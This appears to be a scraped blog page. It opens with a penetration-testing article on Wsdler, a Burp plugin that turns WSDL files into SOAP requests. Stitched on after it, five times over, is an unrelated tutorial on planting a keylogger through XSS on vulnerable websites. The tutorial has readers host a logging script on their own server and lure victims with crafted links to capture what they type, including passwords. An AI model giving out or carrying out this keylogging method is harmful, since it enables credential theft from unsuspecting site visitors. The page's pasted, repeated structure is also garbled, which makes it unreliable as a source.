Header Ads

Hacking Web Services with Burp

WSDL (Web Services Description Language) files are XML formatted descriptions about the operations of web services between clients and servers. They contain possible requests along with the parameters an application uses to communicate with a web service. This is great for penetration testers because we can test and manipulate web services all we want using the information from WSDL files.
One of the best tools to use for working with HTTP requests and responses for applications is Burp. The only downside with Burp is that it does not natively support parsing of WSDL files into requests that can be sent to a web service. A common work around has been to use a tool such as Soap-UI and proxy the requests to Burp for further manipulation. I’ve written a plugin for Burp that takes a WSDL request and parses out the operations that are associated with the targeted web service and creates SOAP requests which can then be sent to a web service. This plugin builds upon the work done by Tom Bujok and his soap-ws project which is essentially the WSDL parsing portion of Soap-UI without the UI.
The Wsdler plugin along with all the source is located at the Github repository here: https://github.com/NetSPI/Wsdler.

Wsdler Requirements

  1. Burp 1.5.01 or later
  2. Must be run from the command line

Starting Wsdler

The command to start Burp with the Wsdler plugin is as follows:
java -classpath Wsdler.jar;burp.jar burp.StartBurp

Sample Usage

Here we will intercept the request for a WSDL file belonging to an online store in Burp.
Burp WSDL intercept request
After the request for the WSDL has been intercepted, right click on the request and select Parse WSDL.
Burp WSDL Parse
A new Wsdler tab will open with the parsed operations for the WSDL, along with the bindings and ports for each of the operations. Operations are synonymous with the requests that the application supports. There are two operations in this WSDL file, OrderItem and CheckStatus. Each of these operations has two bindings, for simplicity’s sake, bindings describe the format and protocol for each of the operations. The bindings for both of the operations are InstantOrderSoap and InstantOrderSoap12. The reason there are two bindings for each of the operations is because the WSDL file supports the creation of SOAP 1.1 and 1.2 requests. Finally, the ”Port” for each of the operations is essentially just the URL the request will be sent to. The full specification for each of the Objects in WSDL files can be read here: http://www.w3.org/TR/wsdl.
Burp SOAP Operations Request
The SOAP requests for the operations will be in the lower part of the Burp window. The parsing functionality will also automatically fill in the data type for each of the parameters in the WSDL operation. In this example, strings are filled in with parts of the Aeneid and integers are filled in with numbers.
The request that Wsdler creates is a standard Burp request, so it can be sent to any other Burp function that accepts requests (intruder, repeater, etc.).
Burp Intruder Request
Here the request is sent to intruder for further testing. Because the request is XML, Burp automatically identifies the parameters for intruder to use.
Burp Payload Positioning

Conclusion

Currently, the plugin only supports WSDL specification 1.1, but there is work on supporting 1.2 / 2.0. Also, I will be adding the option to specify your own strings and integers when the plugin automatically fills in the appropriate data type for each of the parameters in the parsed operations. If there are any bugs or features that you would like to see added, send me an email or create a ticket on Github.
Keylogger is the tool which is used to record the key events. We all know about the keyloggers used int the computer to capture the keystrokes. But this tutorial guide you to create and use a keylogger on a website to capture all keystrokes on that page. As the name suggest, It only works on the website that are XSS vulnerable. As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website. For this attack we need three things: Kelogging script. XSS vulnerable website A webhosting First of all download Keylogging script from Here: DOWNLOAD Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file. Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com Change it to your hosting URL. Now host all these scripts on your web host. Now find a XSS vulnerable website website and include script link like this: http://targetwebsite.com/search.php?q=" Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script. If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords - See more at: http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html#sthash.wlSN4KlY.dpuf

Read more at: http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html
Copyright © Deepanker
Keylogger is the tool which is used to record the key events. We all know about the keyloggers used int the computer to capture the keystrokes. But this tutorial guide you to create and use a keylogger on a website to capture all keystrokes on that page. As the name suggest, It only works on the website that are XSS vulnerable. As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website. For this attack we need three things: Kelogging script. XSS vulnerable website A webhosting First of all download Keylogging script from Here: DOWNLOAD Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file. Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com Change it to your hosting URL. Now host all these scripts on your web host. Now find a XSS vulnerable website website and include script link like this: http://targetwebsite.com/search.php?q=" Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script. If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords - See more at: http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html#sthash.wlSN4KlY.dpuf

Read more at: http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html
Copyright © Deep
Keylogger is the tool which is used to record the key events. We all know about the keyloggers used int the computer to capture the keystrokes. But this tutorial guide you to create and use a keylogger on a website to capture all keystrokes on that page. As the name suggest, It only works on the website that are XSS vulnerable. As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website. For this attack we need three things: Kelogging script. XSS vulnerable website A webhosting First of all download Keylogging script from Here: DOWNLOAD Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file. Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com Change it to your hosting URL. Now host all these scripts on your web host. Now find a XSS vulnerable website website and include script link like this: http://targetwebsite.com/search.php?q=" Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script. If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords - See more at: http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html#sthash.wlSN4KlY.dpuf

Read more at: http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html
Copyright © Deepanker
Keylogger is the tool which is used to record the key events. We all know about the keyloggers used int the computer to capture the keystrokes. But this tutorial guide you to create and use a keylogger on a website to capture all keystrokes on that page. As the name suggest, It only works on the website that are XSS vulnerable. As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website. For this attack we need three things: Kelogging script. XSS vulnerable website A webhosting First of all download Keylogging script from Here: DOWNLOAD Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file. Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com Change it to your hosting URL. Now host all these scripts on your web host. Now find a XSS vulnerable website website and include script link like this: http://targetwebsite.com/search.php?q=" Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script. If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords - See more at: http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html#sthash.wlSN4KlY.dpuf

Read more at: http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html
Copyright © Deepanker
Keylogger is the tool which is used to record the key events. We all know about the keyloggers used int the computer to capture the keystrokes. But this tutorial guide you to create and use a keylogger on a website to capture all keystrokes on that page. As the name suggest, It only works on the website that are XSS vulnerable. As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website. For this attack we need three things: Kelogging script. XSS vulnerable website A webhosting First of all download Keylogging script from Here: DOWNLOAD Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file. Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com Change it to your hosting URL. Now host all these scripts on your web host. Now find a XSS vulnerable website website and include script link like this: http://targetwebsite.com/search.php?q=" Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script. If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords - See more at: http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html#sthash.wlSN4KlY.dpuf

Read more at: http://www.hackingtricks.in/2012/06/keylogging-on-website-with-xss.html
Copyright © Deepanker
Powered by Blogger.